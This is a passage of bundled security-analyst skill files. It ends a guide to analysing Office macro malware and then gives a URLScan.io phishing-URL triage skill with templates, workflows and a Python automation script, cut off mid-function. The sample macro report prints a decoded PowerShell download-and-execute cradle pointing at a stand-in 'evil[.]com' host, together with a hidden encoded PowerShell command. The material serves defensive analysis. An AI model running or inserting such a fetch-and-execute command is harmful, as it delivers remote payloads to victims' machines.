| **Remote Template Injection** | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection |
| **XLM Macros (Excel 4.0)** | Legacy Excel macro language predating VBA; stored in hidden sheets and often missed by traditional VBA analysis tools |
| **Protected View** | Read-only Office sandbox for files from untrusted sources; macros cannot run until the user clicks "Enable Editing" and then "Enable Content", so social engineering lures target both prompts |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **oletools (olevba)**: Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs
|
||||
- **oledump.py**: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction
|
||||
- **XLMDeobfuscator**: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas
|
||||
- **ViperMonkey**: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior
|
||||
- **YARA**: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros
|
||||
|
||||
**Context**: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.
|
||||
|
||||
**Approach**:
|
||||
1. Run oleid to confirm VBA macros are present, then olevba to flag auto-execution keywords
|
||||
2. Extract VBA code with olevba --decode --deobf for initial deobfuscation
|
||||
3. Identify the auto-execution entry point (Auto_Open or Document_Open)
|
||||
4. Trace the execution flow from the entry point through helper functions
|
||||
5. Deobfuscate string concatenation and Chr() encoding to reveal the download URL
|
||||
6. Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)
|
||||
7. Extract all IOCs and create YARA rules for the specific obfuscation pattern
|
||||
|
||||
**Pitfalls**:
|
||||
- Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools
|
||||
- Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers)
|
||||
- Ignoring document metadata that may contain attacker fingerprints (author name, template name)
|
||||
- Not checking for both VBA and XLM macros in the same document (some malware uses both)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
OFFICE MACRO MALWARE ANALYSIS
|
||||
================================
|
||||
Document: invoice_q3_2025.docm
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
File Type: Microsoft Word Document (OOXML with macros)
|
||||
Author: Administrator
|
||||
Creation Date: 2025-09-10 14:23:00
|
||||
|
||||
MACRO ANALYSIS
|
||||
Type: VBA Macro
|
||||
Trigger: AutoOpen()
|
||||
Streams: 3 VBA streams (ThisDocument, Module1, Module2)
|
||||
|
||||
DEOBFUSCATED EXECUTION CHAIN
|
||||
1. AutoOpen() -> Calls Module1.RunPayload()
|
||||
2. RunPayload() builds command string via Chr() concatenation
|
||||
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
|
||||
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')
|
||||
|
||||
SOCIAL ENGINEERING LURE
|
||||
- Document displays fake "Protected Document" image
|
||||
- Instructs user to "Enable Content" to view the document
|
||||
- Content is blurred/hidden until macros execute
|
||||
|
||||
EXTRACTED IOCs
|
||||
Download URL: hxxp://evil[.]com/payload.ps1
|
||||
C2 Domain: evil[.]com
|
||||
IP Address: 185.220.101[.]42
|
||||
User-Agent: PowerShell (default WebClient)
|
||||
|
||||
MITRE ATT&CK
|
||||
T1566.001 Phishing: Spearphishing Attachment
|
||||
T1204.002 User Execution: Malicious File
|
||||
T1059.001 Command and Scripting Interpreter: PowerShell
|
||||
T1059.005 Command and Scripting Interpreter: Visual Basic
|
||||
```
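
Steps 3 and 4 of the execution chain in the sample report depend on decoding the `-enc` argument, which PowerShell expects as Base64 over UTF-16LE text. A minimal sketch of that decoding step follows; `decode_powershell_enc` is a hypothetical helper, and it returns `None` for input that is not valid Base64, such as the truncated string shown in the sample report.

```python
import base64
import binascii


def decode_powershell_enc(b64_text):
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except (binascii.Error, ValueError):
        return None  # not valid Base64 (possibly truncated or padded wrongly)
    # Undecodable byte sequences are replaced rather than raising
    return raw.decode("utf-16-le", errors="replace")
```

The decoded command should be recorded in the report in defanged form, as in the `hxxp://` example above.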
|
||||
@@ -0,0 +1,84 @@
|
||||
---
|
||||
name: analyzing-malicious-url-with-urlscan
|
||||
description: URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolated environment.
|
||||
domain: cybersecurity
|
||||
subdomain: phishing-defense
|
||||
tags: [phishing, email-security, social-engineering, dmarc, awareness, url-analysis, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Malicious URL with URLScan
|
||||
|
||||
## Overview
|
||||
URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolated environment. This skill covers using URLScan's web interface and API to investigate phishing URLs, credential harvesting pages, and malicious redirects without exposing the analyst's system to risk.
|
||||
|
||||
## Prerequisites
|
||||
- URLScan.io account (free tier available, API key for automation)
|
||||
- Python 3.8+ with requests library
|
||||
- Understanding of HTTP protocols and web technologies
|
||||
- Familiarity with phishing URL patterns
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### URLScan Capabilities
|
||||
1. **Safe browsing**: Renders URLs in isolated Chromium instance
|
||||
2. **Screenshot capture**: Visual snapshot of the rendered page
|
||||
3. **DOM analysis**: Full HTML content after JavaScript execution
|
||||
4. **Network log**: All HTTP requests made by the page (HAR format)
|
||||
5. **Certificate analysis**: SSL/TLS certificate details
|
||||
6. **Technology detection**: Identifies web frameworks and libraries
|
||||
7. **IP/ASN mapping**: Infrastructure intelligence
|
||||
8. **Verdict**: Community and automated classification
|
||||
|
||||
### Phishing URL Red Flags
|
||||
- Newly registered domains (< 30 days)
|
||||
- Free hosting services (Wix, GitHub Pages, Firebase)
|
||||
- URL shorteners hiding final destination
|
||||
- Excessive subdomain depth (login.microsoft.com.evil.com)
|
||||
- Brand name in subdomain or path, not domain
|
||||
- Non-standard ports
|
||||
- Data URIs or base64-encoded content
|
||||
- JavaScript-heavy pages with minimal HTML
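
Several of the red flags above can be checked directly from the URL string before any scan is submitted. The sketch below is a heuristic illustration only: it treats the last two host labels as the registered domain (which is wrong for suffixes such as `co.uk`; a public-suffix list would be needed for accuracy), the depth threshold of more than four labels is an arbitrary assumption, and the brand list is a placeholder supplied by the caller.

```python
from urllib.parse import urlsplit


def url_red_flags(url, brands=("microsoft", "paypal")):
    """Return heuristic red flags for a URL (naive, no public-suffix list)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".") if host else []
    # Assumption: the registered domain is the last two labels
    registered = ".".join(labels[-2:])
    subdomain = ".".join(labels[:-2])
    try:
        port = parts.port
    except ValueError:
        port = -1  # a malformed port is itself suspicious

    flags = []
    if len(labels) > 4:
        flags.append("excessive-subdomain-depth")
    brand_elsewhere = any(b in subdomain or b in parts.path.lower() for b in brands)
    brand_in_domain = any(b in registered for b in brands)
    if brand_elsewhere and not brand_in_domain:
        flags.append("brand-outside-registered-domain")
    if port not in (None, 80, 443):
        flags.append("non-standard-port")
    if parts.scheme == "data":
        flags.append("data-uri")
    return flags
```

Flags from this kind of check are triage hints; domain age and hosting provider still need WHOIS or scan data.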
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
### Step 1: Submit URL to URLScan
|
||||
```
|
||||
Web: Navigate to https://urlscan.io and submit the suspicious URL
|
||||
API: POST https://urlscan.io/api/v1/scan/
|
||||
Header: API-Key: your-api-key
|
||||
Body: {"url": "https://suspicious-url.com", "visibility": "private"}
|
||||
```
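
The API call above can be sketched with the Python standard library. The function below only builds the request so it can be inspected before anything is sent; `build_scan_request` is a hypothetical helper, and the set of accepted visibility values (`public`, `unlisted`, `private`) should be confirmed against the current URLScan API documentation.

```python
import json
import urllib.request

SCAN_ENDPOINT = "https://urlscan.io/api/v1/scan/"


def build_scan_request(url, api_key, visibility="private"):
    """Build (but do not send) the scan submission request."""
    if visibility not in ("public", "unlisted", "private"):
        raise ValueError(f"unsupported visibility: {visibility}")
    body = json.dumps({"url": url, "visibility": visibility}).encode("utf-8")
    return urllib.request.Request(
        SCAN_ENDPOINT,
        data=body,
        headers={"API-Key": api_key, "Content-Type": "application/json"},
        method="POST",
    )

# Sending is a separate, explicit step:
#   with urllib.request.urlopen(build_scan_request(u, key), timeout=30) as resp:
#       submission = json.load(resp)
```

Defaulting to `private` keeps the submitted URL out of public search results, which matters when the URL contains victim-specific tokens.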
|
||||
|
||||
### Step 2: Analyze Results
|
||||
- Review screenshot for brand impersonation
|
||||
- Check redirects and final destination URL
|
||||
- Examine DOM for credential input forms
|
||||
- Review network requests for data exfiltration endpoints
|
||||
- Check SSL certificate validity and issuer
|
||||
|
||||
### Step 3: Extract IOCs
|
||||
- Domains and IPs contacted
|
||||
- URLs in redirect chain
|
||||
- SHA-256 hashes of page resources
|
||||
- JavaScript file hashes
|
||||
|
||||
### Step 4: Cross-Reference with Threat Intelligence
|
||||
Use `scripts/process.py` to automate URL scanning, extract IOCs, and cross-reference with VirusTotal, PhishTank, and Google Safe Browsing.
|
||||
|
||||
## Tools & Resources
|
||||
- **URLScan.io**: https://urlscan.io/
|
||||
- **URLScan API**: https://urlscan.io/docs/api/
|
||||
- **VirusTotal URL Scanner**: https://www.virustotal.com/
|
||||
- **PhishTank**: https://phishtank.org/
|
||||
- **Google Safe Browsing**: https://transparencyreport.google.com/safe-browsing/search
|
||||
- **Any.Run**: https://any.run/ (interactive sandbox)
|
||||
- **Hybrid Analysis**: https://www.hybrid-analysis.com/
|
||||
|
||||
## Validation
|
||||
- Successfully scan a suspicious URL via API
|
||||
- Extract screenshot and identify brand impersonation
|
||||
- Document complete redirect chain
|
||||
- Generate IOC list from scan results
|
||||
- Cross-reference findings with at least 2 threat intelligence sources
|
||||
@@ -0,0 +1,87 @@
|
||||
# URL Analysis Report Template
|
||||
|
||||
## Analysis Information
|
||||
- **Analyst**: [Name]
|
||||
- **Date**: [YYYY-MM-DD]
|
||||
- **Case ID**: [CASE-XXXX]
|
||||
- **Source**: [User report / Email gateway / SIEM alert]
|
||||
|
||||
## URL Details
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| Original URL | |
|
||||
| Defanged URL | hxxps://... |
|
||||
| Final URL (after redirects) | |
|
||||
| URLScan UUID | |
|
||||
| Scan visibility | private/public |
|
||||
|
||||
## Page Analysis
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| Page Title | |
|
||||
| HTTP Status | |
|
||||
| Server | |
|
||||
| Domain | |
|
||||
| IP Address | |
|
||||
| ASN | |
|
||||
| Country | |
|
||||
| Login Form Detected | Yes/No |
|
||||
|
||||
## TLS Certificate
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| Issuer | |
|
||||
| Subject | |
|
||||
| Valid From | |
|
||||
| Valid To | |
|
||||
| Certificate Age | |
|
||||
|
||||
## Redirect Chain
|
||||
| # | URL | Status |
|
||||
|---|---|---|
|
||||
| 1 (original) | | |
|
||||
| 2 | | |
|
||||
| 3 (final) | | |
|
||||
|
||||
## Threat Intelligence Cross-Reference
|
||||
| Source | Result | Score |
|
||||
|---|---|---|
|
||||
| URLScan Verdict | | |
|
||||
| VirusTotal | /XX engines | |
|
||||
| PhishTank | | |
|
||||
| Google Safe Browsing | | |
|
||||
| AbuseIPDB | | |
|
||||
|
||||
## IOCs Extracted
|
||||
### Domains
|
||||
| Domain | Role | Reputation |
|
||||
|---|---|---|
|
||||
| | | |
|
||||
|
||||
### IP Addresses
|
||||
| IP | ASN | Country | Reputation |
|
||||
|---|---|---|---|
|
||||
| | | | |
|
||||
|
||||
### File Hashes
|
||||
| Hash (SHA-256) | Type | Size |
|
||||
|---|---|---|
|
||||
| | | |
|
||||
|
||||
## Classification
|
||||
- [ ] Phishing - Credential Harvesting
|
||||
- [ ] Phishing - Malware Delivery
|
||||
- [ ] Scam / Fraud
|
||||
- [ ] Benign
|
||||
- [ ] Inconclusive
|
||||
|
||||
## Recommended Actions
|
||||
- [ ] Block domain at proxy/firewall
|
||||
- [ ] Block IP at firewall
|
||||
- [ ] Add to email gateway blocklist
|
||||
- [ ] Submit to PhishTank / APWG
|
||||
- [ ] Notify affected users
|
||||
- [ ] Request domain takedown
|
||||
|
||||
## Notes
|
||||
[Additional analysis observations]
|
||||
@@ -0,0 +1,42 @@
|
||||
# Standards & References: Analyzing Malicious URLs with URLScan
|
||||
|
||||
## MITRE ATT&CK References
|
||||
- **T1566.002**: Phishing: Spearphishing Link
|
||||
- **T1204.001**: User Execution: Malicious Link
|
||||
- **T1608.005**: Stage Capabilities: Link Target
|
||||
- **T1071.001**: Application Layer Protocol: Web Protocols
|
||||
- **T1102**: Web Service (for C2 via web)
|
||||
|
||||
## URLScan.io API Reference
|
||||
| Endpoint | Method | Description |
|---|---|---|
| `/api/v1/scan/` | POST | Submit URL for scanning |
| `/api/v1/result/{uuid}/` | GET | Get scan results |
| `/api/v1/search/?q=` | GET | Search scan database |
| `/screenshots/{uuid}.png` | GET | Get page screenshot |
| `/dom/{uuid}/` | GET | Get rendered DOM |
|
||||
|
||||
### Search Query Syntax
|
||||
- `domain:example.com` - Search by domain
|
||||
- `ip:1.2.3.4` - Search by IP
|
||||
- `server:nginx` - Search by web server
|
||||
- `filename:login.php` - Search by filename
|
||||
- `hash:abc123` - Search by resource hash
|
||||
- `page.domain:example.com AND date:>now-7d` - Combined queries
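
Queries like these contain characters (`:`, `>`, spaces) that must be URL-encoded before they are placed in the `q` parameter. A small sketch of building the Search API URL; `build_search_url` is a hypothetical helper.

```python
from urllib.parse import urlencode

SEARCH_ENDPOINT = "https://urlscan.io/api/v1/search/"


def build_search_url(query):
    """Return the Search API URL with the query safely percent-encoded."""
    return SEARCH_ENDPOINT + "?" + urlencode({"q": query})
```

For example, `build_search_url("domain:example.com")` yields a URL whose `q` value is `domain%3Aexample.com`.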
|
||||
|
||||
## Industry Standards
|
||||
- **NIST SP 800-83**: Guide to Malware Incident Prevention and Handling
|
||||
- **NIST SP 800-86**: Guide to Integrating Forensic Techniques into Incident Response
|
||||
- **RFC 3986**: Uniform Resource Identifier (URI): Generic Syntax
|
||||
|
||||
## URL Classification Indicators
|
||||
| Indicator | Risk Level | Description |
|
||||
|---|---|---|
|
||||
| Domain age < 7 days | Critical | Very recently registered |
|
||||
| Domain age < 30 days | High | Recently registered |
|
||||
| Free TLS cert (Let's Encrypt) with brand impersonation | High | Common phishing pattern |
|
||||
| URL shortener | Medium | Obfuscates destination |
|
||||
| Credential input form on non-brand domain | Critical | Credential harvesting |
|
||||
| JavaScript obfuscation | High | Evasion technique |
|
||||
| Multiple redirects | Medium | Chain obfuscation |
|
||||
| Data URI scheme | High | Inline content, hard to trace |
|
||||
@@ -0,0 +1,96 @@
|
||||
# Workflows: Analyzing Malicious URLs with URLScan
|
||||
|
||||
## Workflow 1: URL Triage Pipeline
|
||||
|
||||
```
|
||||
Suspicious URL received (from user report / email gateway / SIEM)
|
||||
|
|
||||
v
|
||||
[Step 1: Defang and document URL]
|
||||
+-- Replace http with hxxp, . with [.]
|
||||
+-- Record original context (email subject, sender, timestamp)
|
||||
|
|
||||
v
|
||||
[Step 2: Submit to URLScan (private visibility)]
|
||||
+-- POST to /api/v1/scan/
|
||||
+-- Wait for scan completion (poll /api/v1/result/{uuid}/)
|
||||
|
|
||||
v
|
||||
[Step 3: Analyze results]
|
||||
+-- Review screenshot for brand impersonation
|
||||
+-- Check redirect chain (original URL vs final URL)
|
||||
+-- Examine DOM for login forms / credential inputs
|
||||
+-- Review network requests for suspicious endpoints
|
||||
+-- Check SSL certificate details
|
||||
|
|
||||
v
|
||||
[Step 4: Classify]
|
||||
+-- Phishing (credential harvesting)
|
||||
+-- Malware delivery
|
||||
+-- Scam / fraud
|
||||
+-- Benign (false positive)
|
||||
|
|
||||
v
|
||||
[Step 5: Action]
|
||||
+-- If malicious: Extract IOCs, block domain/IP, update filters
|
||||
+-- If benign: Document and close
|
||||
+-- If uncertain: Escalate for deeper analysis
|
||||
```
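
Step 1 of this pipeline can be sketched as a pair of helpers that apply exactly the two substitutions named in the diagram (`http` to `hxxp`, `.` to `[.]`) and reverse them before submission. Both function names are hypothetical.

```python
import re


def defang(url):
    """Defang a URL for safe sharing: http -> hxxp, '.' -> '[.]'."""
    out = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    return out.replace(".", "[.]")


def refang(text):
    """Reverse defang() before submitting the URL to a scanner."""
    out = text.replace("[.]", ".")
    return re.sub(r"^hxxp", "http", out, flags=re.IGNORECASE)
```

Storing only the defanged form in tickets and reports reduces the chance of an accidental click, while `refang` restores the value needed for the API submission in Step 2.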
|
||||
|
||||
## Workflow 2: Bulk URL Analysis
|
||||
|
||||
```
|
||||
URL list from email gateway / threat feed
|
||||
|
|
||||
v
|
||||
[Batch submit to URLScan API]
|
||||
+-- Rate limit: 2 submissions/second (free tier)
|
||||
+-- Use private visibility for sensitive URLs
|
||||
|
|
||||
v
|
||||
[Collect all results]
|
||||
+-- Poll each scan UUID for completion
|
||||
+-- Download screenshots and DOM content
|
||||
|
|
||||
v
|
||||
[Automated triage]
|
||||
+-- Flag: credential input forms detected
|
||||
+-- Flag: brand impersonation in screenshot
|
||||
+-- Flag: known phishing infrastructure (IP/ASN)
|
||||
+-- Flag: newly registered domains
|
||||
|
|
||||
v
|
||||
[Generate report]
|
||||
+-- Categorized URL list (malicious / suspicious / clean)
|
||||
+-- IOC extract for blocking
|
||||
+-- Statistics summary
|
||||
```
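
The batch submission step needs some form of pacing. The generator below is one simple way to do it, shown as a sketch: it yields items no faster than a given rate, using the 2 per second figure from the diagram as its default (actual quotas depend on the account and should be checked against the API's rate-limit responses). The `clock` and `sleep` parameters exist only so the behavior can be tested without real delays.

```python
import time


def throttled(items, per_second=2.0, clock=time.monotonic, sleep=time.sleep):
    """Yield items no faster than per_second, e.g. to pace scan submissions."""
    interval = 1.0 / per_second
    next_slot = clock()
    for item in items:
        delay = next_slot - clock()
        if delay > 0:
            sleep(delay)  # wait until the next submission slot opens
        next_slot = max(next_slot, clock()) + interval
        yield item
```

A caller would wrap the URL list, for example `for url in throttled(urls): ...`, and still handle HTTP 429 responses, since a client-side throttle cannot see the server's remaining quota.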
|
||||
|
||||
## Workflow 3: IOC Extraction and Enrichment
|
||||
|
||||
```
|
||||
URLScan result available
|
||||
|
|
||||
v
|
||||
[Extract from scan]
|
||||
+-- All domains contacted
|
||||
+-- All IPs contacted
|
||||
+-- SSL certificate fingerprints
|
||||
+-- JavaScript file hashes
|
||||
+-- Page resource hashes
|
||||
+-- Final redirect URL
|
||||
|
|
||||
v
|
||||
[Cross-reference]
|
||||
+-- VirusTotal: domain/IP/hash reputation
|
||||
+-- PhishTank: known phishing URL database
|
||||
+-- WHOIS: domain registration details
|
||||
+-- AbuseIPDB: IP abuse reports
|
||||
+-- Google Safe Browsing: malware/phishing flags
|
||||
|
|
||||
v
|
||||
[Compile IOC package]
|
||||
+-- STIX bundle (delivered over TAXII) for TIP
|
||||
+-- CSV for firewall/proxy rules
|
||||
+-- JSON for SIEM enrichment
|
||||
```
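
The extraction and CSV packaging steps can be sketched as follows. The layout of the result dictionary (`lists.domains`, `lists.ips`, `lists.hashes`, `page.url`) is an assumption about the scan result JSON and should be verified against a real response; both helper names are hypothetical.

```python
import csv
import io


def extract_iocs(result):
    """Collect de-duplicated IOCs from a scan result dictionary."""
    lists = result.get("lists", {})
    page = result.get("page", {})
    return {
        "domains": sorted(set(lists.get("domains", []))),
        "ips": sorted(set(lists.get("ips", []))),
        "hashes": sorted(set(lists.get("hashes", []))),
        "final_url": page.get("url", ""),
    }


def iocs_to_csv(iocs):
    """Render domains and IPs as type,value rows for blocklist import."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["type", "value"])
    for kind in ("domains", "ips"):
        for value in iocs[kind]:
            writer.writerow([kind.rstrip("s"), value])
    return buf.getvalue()
```

Sorting and de-duplicating keeps the output stable between runs, which makes diffs of successive IOC packages meaningful.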
|
||||
@@ -0,0 +1,439 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
URLScan.io URL Analysis Automation
|
||||
|
||||
Submits suspicious URLs to URLScan.io for analysis, retrieves results,
|
||||
extracts IOCs, and cross-references with threat intelligence sources.
|
||||
|
||||
Usage:
|
||||
python process.py scan --url "https://suspicious-site.com"
|
||||
python process.py scan --url-file urls.txt
|
||||
python process.py result --uuid <scan-uuid>
|
||||
python process.py search --query "domain:evil.com"
|
||||
python process.py ioc --uuid <scan-uuid>
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import os
|
||||
import hashlib
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from dataclasses import dataclass, field, asdict
|
||||
|
||||
try:
|
||||
import requests
|
||||
HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
HAS_REQUESTS = False
|
||||
|
||||
URLSCAN_API_KEY = os.environ.get("URLSCAN_API_KEY", "")
|
||||
URLSCAN_BASE = "https://urlscan.io/api/v1"
|
||||
VT_API_KEY = os.environ.get("VT_API_KEY", "")
|
||||
|
||||
|
||||
@dataclass
class URLScanResult:
    """Parsed URLScan result."""
    uuid: str = ""
    url: str = ""
    effective_url: str = ""
    status_code: int = 0
    domain: str = ""
    ip: str = ""
    asn: str = ""
    asn_name: str = ""
    country: str = ""
    server: str = ""
    title: str = ""
    tls_issuer: str = ""
    tls_subject: str = ""
    tls_valid_from: str = ""
    tls_valid_to: str = ""
    screenshot_url: str = ""
    dom_url: str = ""
    technologies: list = field(default_factory=list)
    redirects: list = field(default_factory=list)
    domains_contacted: list = field(default_factory=list)
    ips_contacted: list = field(default_factory=list)
    urls_contacted: list = field(default_factory=list)
    has_login_form: bool = False
    resource_hashes: list = field(default_factory=list)
    verdicts: dict = field(default_factory=dict)
    is_malicious: bool = False
    risk_indicators: list = field(default_factory=list)


def submit_scan(url: str, visibility: str = "private",
                api_key: str = "") -> dict:
    """Submit a URL to URLScan for scanning."""
    if not api_key:
        api_key = URLSCAN_API_KEY
    if not api_key:
        print("Warning: No URLScan API key provided; the submission API "
              "may reject unauthenticated requests.", file=sys.stderr)

    headers = {"Content-Type": "application/json"}
    if api_key:
        headers["API-Key"] = api_key

    data = {"url": url, "visibility": visibility}

    try:
        resp = requests.post(f"{URLSCAN_BASE}/scan/", headers=headers,
                             json=data, timeout=30)
        if resp.status_code == 200:
            return resp.json()
        elif resp.status_code == 429:
            # Retry once after a fixed back-off when rate limited
            print("Rate limited. Waiting 10 seconds...", file=sys.stderr)
            time.sleep(10)
            resp = requests.post(f"{URLSCAN_BASE}/scan/", headers=headers,
                                 json=data, timeout=30)
            return resp.json() if resp.status_code == 200 else {"error": resp.text}
        else:
            return {"error": f"HTTP {resp.status_code}: {resp.text}"}
    except Exception as e:
        return {"error": str(e)}


def get_result(uuid: str, api_key: str = "", max_wait: int = 60) -> dict:
    """Get scan results, polling until ready."""
    if not api_key:
        api_key = URLSCAN_API_KEY

    headers = {}
    if api_key:
        headers["API-Key"] = api_key

    for attempt in range(max_wait // 5):
        try:
            resp = requests.get(f"{URLSCAN_BASE}/result/{uuid}/",
                                headers=headers, timeout=30)
            if resp.status_code == 200:
                return resp.json()
            elif resp.status_code == 404:
                time.sleep(5)
                continue
            else:
                return {"error": f"HTTP {resp.status_code}: {resp.text}"}
        except Exception as e:
            return {"error": str(e)}

    return {"error": "Timeout waiting for scan results"}


def search_scans(query: str, api_key: str = "", size: int = 10) -> list:
    """Search URLScan database."""
    if not api_key:
        api_key = URLSCAN_API_KEY

    headers = {}
    if api_key:
        headers["API-Key"] = api_key

    try:
        # Pass the query through params so requests URL-encodes it;
        # search queries often contain spaces, quotes, and colons.
        resp = requests.get(f"{URLSCAN_BASE}/search/",
                            params={"q": query, "size": size},
                            headers=headers, timeout=30)
        if resp.status_code == 200:
            return resp.json().get("results", [])
        print(f"Search failed: HTTP {resp.status_code}", file=sys.stderr)
    except Exception as e:
        print(f"Search failed: {e}", file=sys.stderr)
    return []


def parse_result(raw_result: dict) -> URLScanResult:
    """Parse raw URLScan API result into structured data."""
    result = URLScanResult()

    task = raw_result.get("task", {})
    result.uuid = task.get("uuid", "")
    result.url = task.get("url", "")

    page = raw_result.get("page", {})
    result.effective_url = page.get("url", "")
    result.status_code = page.get("status", 0)
    result.domain = page.get("domain", "")
    result.ip = page.get("ip", "")
    result.asn = page.get("asn", "")
    result.asn_name = page.get("asnname", "")
    result.country = page.get("country", "")
    result.server = page.get("server", "")
    result.title = page.get("title", "")

    # TLS info
    tls_list = raw_result.get("lists", {}).get("certificates", [])
    if tls_list:
        cert = tls_list[0]
        result.tls_issuer = cert.get("issuer", "")
        result.tls_subject = cert.get("subjectName", "")
        result.tls_valid_from = cert.get("validFrom", "")
        result.tls_valid_to = cert.get("validTo", "")

    # Screenshot and DOM URLs
    result.screenshot_url = f"https://urlscan.io/screenshots/{result.uuid}.png"
    result.dom_url = f"https://urlscan.io/dom/{result.uuid}/"

    # Technologies
    meta = raw_result.get("meta", {})
    for processor in meta.get("processors", {}).values():
        if isinstance(processor, dict) and "data" in processor:
            techs = processor["data"]
            if isinstance(techs, list):
                for tech in techs:
                    if isinstance(tech, dict) and "app" in tech:
                        result.technologies.append(tech["app"])

    # Redirects (heuristic: any of the first five request URLs that differs
    # from the submitted URL is treated as a redirect hop)
    data = raw_result.get("data", {})
    for request in data.get("requests", [])[:5]:
        req_url = request.get("request", {}).get("request", {}).get("url", "")
        if req_url and req_url != result.url:
            result.redirects.append(req_url)

    # Domains and IPs contacted
    lists = raw_result.get("lists", {})
    result.domains_contacted = lists.get("domains", [])
    result.ips_contacted = lists.get("ips", [])
    result.urls_contacted = lists.get("urls", [])[:50]

    # Resource hashes
    for request in data.get("requests", []):
        resp_data = request.get("response", {}).get("response", {})
        resp_hash = resp_data.get("hash", "")
        if resp_hash:
            result.resource_hashes.append({
                "url": resp_data.get("url", ""),
                "hash": resp_hash,
                "size": resp_data.get("size", 0),
                "mimeType": resp_data.get("mimeType", "")
            })

    # Check for login forms in DOM. A password input is required: a bare
    # <form> tag is too common to count as a login form.
    dom_content = raw_result.get("data", {}).get("dom", "")
    if isinstance(dom_content, str):
        dom_lower = dom_content.lower()
        if ('type="password"' in dom_lower or
                "type='password'" in dom_lower or
                'type=password' in dom_lower):
            result.has_login_form = True

    # Verdicts
    verdicts = raw_result.get("verdicts", {})
    result.verdicts = {
        "overall_score": verdicts.get("overall", {}).get("score", 0),
        "overall_malicious": verdicts.get("overall", {}).get("malicious", False),
        "urlscan_score": verdicts.get("urlscan", {}).get("score", 0),
        "engines": verdicts.get("engines", {}).get("malicious", []),
        "community_score": verdicts.get("community", {}).get("score", 0),
    }
    result.is_malicious = verdicts.get("overall", {}).get("malicious", False)

    # Risk indicators
    # Guard against submitted URLs without a scheme, which have no third
    # "/"-separated component.
    url_parts = result.url.split("/")
    submitted_host = url_parts[2] if len(url_parts) > 2 else ""
    if result.has_login_form and result.domain != submitted_host:
        result.risk_indicators.append("Credential harvesting form on non-origin domain")
    if result.url != result.effective_url:
        result.risk_indicators.append(f"URL redirected: {result.url} -> {result.effective_url}")
    if result.is_malicious:
        result.risk_indicators.append("Flagged as malicious by URLScan verdicts")
    if len(result.redirects) > 3:
        result.risk_indicators.append(f"Excessive redirects ({len(result.redirects)})")

    return result


def extract_iocs(result: URLScanResult) -> dict:
    """Extract IOCs from scan result."""
    iocs = {
        "domains": list(set(result.domains_contacted)),
        "ips": list(set(result.ips_contacted)),
        "urls": [result.url, result.effective_url] + result.redirects,
        "hashes": [h["hash"] for h in result.resource_hashes if h.get("hash")],
        "tls_fingerprint": result.tls_subject,
        "scan_uuid": result.uuid,
        "scan_date": datetime.now(timezone.utc).isoformat(),
    }
    # Deduplicate URLs
    iocs["urls"] = list(set(u for u in iocs["urls"] if u))
    return iocs


def check_virustotal(url: str, api_key: str = "") -> dict:
    """Check URL against VirusTotal (requires API key)."""
    import base64  # local import: only needed for the URL identifier below

    if not api_key:
        api_key = VT_API_KEY
    if not api_key:
        return {}

    # VirusTotal v3 accepts the unpadded URL-safe base64 of the URL as its
    # identifier. A SHA-256 only matches when computed over the canonicalized
    # URL, which the raw submitted string may not be.
    url_id = base64.urlsafe_b64encode(url.encode()).decode().strip("=")
    headers = {"x-apikey": api_key}

    try:
        resp = requests.get(f"https://www.virustotal.com/api/v3/urls/{url_id}",
                            headers=headers, timeout=15)
        if resp.status_code == 200:
            data = resp.json().get("data", {}).get("attributes", {})
            stats = data.get("last_analysis_stats", {})
            return {
                "malicious": stats.get("malicious", 0),
                "suspicious": stats.get("suspicious", 0),
                "harmless": stats.get("harmless", 0),
                "undetected": stats.get("undetected", 0),
            }
    except Exception:
        pass
    return {}


def format_report(result: URLScanResult) -> str:
    """Format scan result as text report."""
    lines = []
    lines.append("=" * 60)
    lines.append(" URL ANALYSIS REPORT (URLScan.io)")
    lines.append("=" * 60)
    lines.append(f" Scan UUID: {result.uuid}")
    lines.append(f" Submitted URL: {result.url}")
    lines.append(f" Effective URL: {result.effective_url}")
    lines.append(f" Status Code: {result.status_code}")
    lines.append(f" Malicious: {'YES' if result.is_malicious else 'NO'}")
    lines.append("")

    lines.append("[PAGE INFO]")
    lines.append(f" Title: {result.title}")
    lines.append(f" Domain: {result.domain}")
    lines.append(f" IP: {result.ip}")
    lines.append(f" ASN: {result.asn} ({result.asn_name})")
